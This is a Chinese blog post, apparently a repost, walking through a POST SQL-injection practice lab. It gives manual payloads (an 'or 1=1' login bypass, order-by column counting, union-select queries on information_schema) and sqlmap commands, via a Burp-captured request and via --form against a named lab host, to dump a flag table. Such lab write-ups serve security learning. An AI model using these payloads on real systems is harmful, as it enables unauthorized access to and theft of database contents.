其他分享
首页 > 其他分享> > POST注入靶场练习

POST注入靶场练习

作者:互联网

题目1

使用手工注入

1、判断是否存在SQL注入

(1)admin'后直接使用-- qwe注释

(2)使用万能密码

admin     ' or 1=1 -- qwe

SQL注入成功

2、判断字段数

输入admin' order by 3 -- qwe和admin' order by 4 -- qwe,只有order by 3的时候可以输出,则字段数是3

3、查找回显点

admiiin' union select 1,2,3 -- qwe

ps:由于网站输出会输出数据库最上面一行数据,与union select 后的数据和admin原本数据冲突,所以代码最头上的需要输出一个不存在的值

4、利用系统自带库查找数据表和字段

admin' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1-- qwe

查找到flag数据表

查找到flag字段

admin' union select 1,column_name,3 from information_schema.columns where table_name='flag' and table_schema=database() limit 1,1-- qwe

5、查找数据

admin' union select 1,flag,3 from flag limit 1,1-- qwe,得到flag

 

题目二——使用sqlmap+burp

一、设置chorme插件SwitchySharp

http代理设置为本地127.0.0.1,端口自行设计

二、Burp中查看Proxy Listener

回显是127.0.0.1

三、开启抓包

在登录框随意输入内容,点击登录,Burp中抓取到数据包

 

四、使用sqlmap

(1)把Burp抓包的内容复制到sqlmap文件夹下的一个文本文档1.txt

ps:把需要知道的字段前添加*

(2)输入py -2 sqlmap.py -r 1.txt --level 3 --risk 2,确定查询信息

(3)查找数据库名

py -2 sqlmap.py -r 1.txt --dbs --level 3 --risk 2

(3)进入数据库,查看数据表

py -2 sqlmap.py -r 1.txt --D error --tables --level 3 --risk 2

(4)查看数据库内信息

py -2 sqlmap.py -r 1.txt --D error -T error_flag --dump --level 3 --risk 2

由于查询的error数据库中的flag都不是真的flag,我又去找了post_error库中的flag,方法同上,找到了flag

 

题目二——使用sqlmap的--form

(1)查看sql注入信息

py -2 sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-06/index.php --form --level 3 --risk 2

(2)查找数据库

py -2 sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-06/index.php --form --risk 2 --level 3 --dbs

剩下步骤和sqlmap+Burp方法一样

 

 

 

标签:sqlmap,练习,--,qwe,py,admin,flag,POST,靶场
来源: https://blog.csdn.net/weixin_45540609/article/details/115730494